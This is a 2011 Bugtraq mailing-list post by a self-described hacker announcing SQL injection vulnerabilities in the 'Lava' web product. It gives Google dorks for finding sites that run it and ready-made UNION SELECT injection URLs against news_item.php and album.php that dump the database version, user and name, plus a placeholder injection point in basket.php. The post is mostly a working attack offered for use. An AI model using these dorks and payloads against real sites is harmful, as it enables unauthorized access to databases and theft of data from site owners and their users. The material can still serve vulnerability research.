
Date: Tue, 26 Jul 2011 11:45:11 GMT
From: ehsan_hp200@...mail.com
To: bugtraq@...urityfocus.com
Subject: Lava (news_item.php?id) (album.php?id) (basket.php?baction) 
 Remote SQL injection Vulnerability

################################  IRANIAN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
## Lava (news_item.php?id) (album.php?id) (basket.php?baction)
##                           
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email    : Ehsan_Hp200@...mail.com
##  
## Vendor : http://www.lava.com.ua/
##  
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
#############################
##
##

Dork : "&#1056;&#1072;&#1079;&#1088;&#1072;&#1073;&#1086;&#1090;&#1072;&#1085;&#1086; &#1074; &#1082;&#1086;&#1084;&#1087;&#1072;&#1085;&#1080;&#1080; "Lava"" "inurl:news_item.php?id="

Exploite:

www.victim.com/news_item.php?id=-1 union select 1,ConCat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15


Dork : "&#1056;&#1072;&#1079;&#1088;&#1072;&#1073;&#1086;&#1090;&#1072;&#1085;&#1086; &#1074; &#1082;&#1086;&#1084;&#1087;&#1072;&#1085;&#1080;&#1080; "Lava"" "inurl:album.php?id="

Exploite :

www.victim.com/album.php?id=-1+union+select+1,2,3,4,5,6,ConCat(version(),0x3a,user(),0x3a,database())


Dork : "&#1056;&#1072;&#1079;&#1088;&#1072;&#1073;&#1086;&#1090;&#1072;&#1085;&#1086; &#1074; &#1082;&#1086;&#1084;&#1087;&#1072;&#1085;&#1080;&#1080; "Lava"" "inurl:basket.php?baction="

Exploite :

www.victim.com/basket.php?baction=add&pid=[SQL]

#########################################################################################
SpeCial TanX To :  Dj7Xpl
##########################################################################################
###############################  IRANIAN THE BEST HACKERS IN THE WORLD ##################
